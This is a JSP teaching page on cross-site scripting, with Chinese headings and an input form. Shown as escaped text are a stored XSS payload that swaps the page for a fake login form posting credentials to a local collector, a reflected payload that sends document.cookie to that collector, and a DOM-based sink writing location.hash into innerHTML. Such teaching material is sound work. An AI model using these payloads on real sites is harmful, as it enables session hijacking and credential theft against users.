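<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ taglib uri="http://java.sun.com/jsp/jstl/core" prefix="c" %>
<%--
  XSS teaching page. Every sample payload below is written with HTML entities
  (&lt; &gt;) so it is displayed as text, never parsed as markup, and this file
  itself contains no <script> element. The only live input is the form, posted
  to /xss/out, which is not part of this file; whatever renders xssStr must
  escape it on output. The core taglib imported above provides <c:out>, whose
  escapeXml defaults to true, for exactly that purpose.
--%>
<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>tomas的测试页面</title>
</head>
<body>
  <h1>你好:世界</h1>

  <form action="/xss/out" method="post">
    <p>
      <label for="xssStr">First name:</label>
      <input id="xssStr" name="xssStr" type="text" style="width:450px;height: 100px;">
    </p>
    <button type="submit">Submit</button>
  </form>

  <section style="background-color: gainsboro ">
    <h2>输入实例:</h2>
    <ol>
      <li>
        <p>存贮型:</p>
<pre><code>&lt;script&gt;document.body.innerHTML="&lt;h1&gt;PleaseLogin&lt;/h1&gt;
&lt;form action=http://127.0.0.1:8080/xss/cookie method=post&gt;
&lt;br&gt;User name:&lt;input type=text name=name&gt;&lt;br&gt;
Password:&lt;input type=text name=password&gt;&lt;/p&gt;
&lt;input type=submit name=login&gt;&lt;/form&gt;"&lt;/script&gt;</code></pre>
      </li>
      <li>
        <p>反射型:</p>
<pre style="font-family:'Menlo';font-size:12.0pt;"><code>&lt;script&gt;document.write('&lt;img src="http://127.0.0.1:8080/xss/cookie?foo='+encodeURI(document.cookie)+'"/&gt;')&lt;/script&gt;</code></pre>
      </li>
      <li>
        <p>基于DOM型XSS样例</p>
        <p>如下面请求的hash部分，由客户端JS动态执行产生XSS注入。</p>
        <p><code>http://www.webapp.com/example.jsp?param1=value1#\u003ciframe onload=alert('xss')\u003e</code></p>
<pre><code>&lt;div id="m"&gt;&lt;/div&gt;
&lt;script&gt;
    var y=location.hash.substring(1);
    document.getElementById("m").innerHTML = y;
&lt;/script&gt;</code></pre>
        <p>动态生成</p>
        <!-- Placeholder only: this file ships no script, so nothing writes into it. -->
        <div id="m"></div>
        <p><code style="font-family: 宋体, simsun; line-height: 24.5px; text-indent: 28px; background-color: #ffffff;">&lt;div id="m"&gt;&lt;iframe onload="alert('xss')"&gt;&lt;/iframe&gt;&lt;/div&gt;</code></p>
      </li>
    </ol>
  </section>
</body>
</html>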
